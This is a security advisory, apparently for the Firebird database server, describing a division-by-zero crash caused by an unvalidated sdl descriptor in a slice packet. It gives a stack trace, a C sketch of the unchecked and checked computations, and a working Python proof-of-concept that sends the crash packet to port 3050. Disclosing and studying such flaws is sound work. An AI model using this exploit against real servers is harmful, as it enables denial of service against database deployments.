Summary
A malicious slice packet can lead to a division by zero because the decoded sdl descriptor is not validated.
Details
The sdl_desc() function does not validate the length of the resulting descriptor and simply returns it. Later, dsc_length is used to calculate the number of items in the slice, which results in a division by zero.
But this vulnerability is not very stable: on a Release build I was able to reproduce it on v3 only, and with Debug I was able to reproduce it on all actual versions (>=v3). My guess is that division by zero is UB, and the compiler feels free to do anything it wants when this error occurs.
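The following is an added illustration, not Firebird's code: a hypothetical reconstruction of the item-count computation described above, with the unchecked division (undefined behaviour when dsc_length is zero, which is why the crash depends on the build) beside a checked form that rejects a malformed descriptor before dividing. The function names and the sample lengths are assumptions.

```c
#include <stddef.h>
#include <stdio.h>

/* Unchecked form (hypothetical): the decoder trusts dsc_length as returned by
 * the descriptor decoder. Dividing by zero here is undefined behaviour, so a
 * Release build may crash, loop, or return garbage depending on the compiler. */
size_t slice_items_unchecked(size_t slice_length, size_t dsc_length) {
    return slice_length / dsc_length;
}

/* Checked form (hypothetical): validate the decoded descriptor first.
 * Returns the item count, or -1 if the descriptor is malformed: an element
 * length of zero, or one that does not evenly divide the slice. The caller is
 * expected to reject the packet on -1 instead of continuing to decode it. */
long slice_item_count(size_t slice_length, size_t dsc_length) {
    if (dsc_length == 0 || slice_length % dsc_length != 0) {
        return -1;
    }
    return (long)(slice_length / dsc_length);
}

int main(void) {
    /* Constructed inputs: a 64-byte slice with 8-byte elements, then a
     * descriptor that decoded to dsc_length == 0 as in the advisory. */
    printf("64/8 -> %ld\n", slice_item_count(64, 8));   /* 8  */
    printf("64/0 -> %ld\n", slice_item_count(64, 0));   /* -1 */
    printf("65/8 -> %ld\n", slice_item_count(65, 8));   /* -1 */
    return 0;
}
```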
Stacktrace
#0 xdr_slice (xdrs=0x7ffff7ec6ec0, slice=0x7ffff29f7908, sdl=0x7ffff7ec7010 "\001\006\001(") at src/remote/protocol.cpp:1881
#1 xdr_protocol (xdrs=0x7ffff7ec6ec0, p=0x7ffff29f7640) at src/remote/protocol.cpp:620
#2 receive (main_port=0x7ffff7ebde50, packet=0x7ffff29f7640) at src/remote/inet.cpp:2041
#3 rem_port::receive (this=0x7ffff7ebde50, pckt=0x7ffff29f7640) at src/remote/remote.cpp:664
#4 SRVR_multi_thread (main_port=0x7ffff7eb76d0, flags=2) at src/remote/server/server.cpp:1787
#5 main (argc=1, argv=0x7fffffffd460) at src/remote/server/os/posix/inet_server.cpp:582
PoC
To reproduce the vulnerability, run the server and then the Python script, which sends the malicious packet.
Python script
from pwn import *  # provides struct and remote()

def build_crash_packet():
    pkt = struct.pack(">I", 0x3a)
    pkt += struct.pack(">I", 1) * 4
    pkt += struct.pack(">I", 8)
    # sdl descriptor bytes; these are the "\001\006\001(" seen as the sdl
    # argument of xdr_slice() in the stacktrace above
    pkt += b'\x01\x06\x01\x28'
    pkt += b'\x00\x00\x10\xff'
    pkt += struct.pack(">I", 3)
    pkt += b'\x00SYSDB\x00\x00'
    return pkt

p = remote('localhost', 3050)
p.send(build_crash_packet())
p.close()
Impact
Essentially, every server is affected.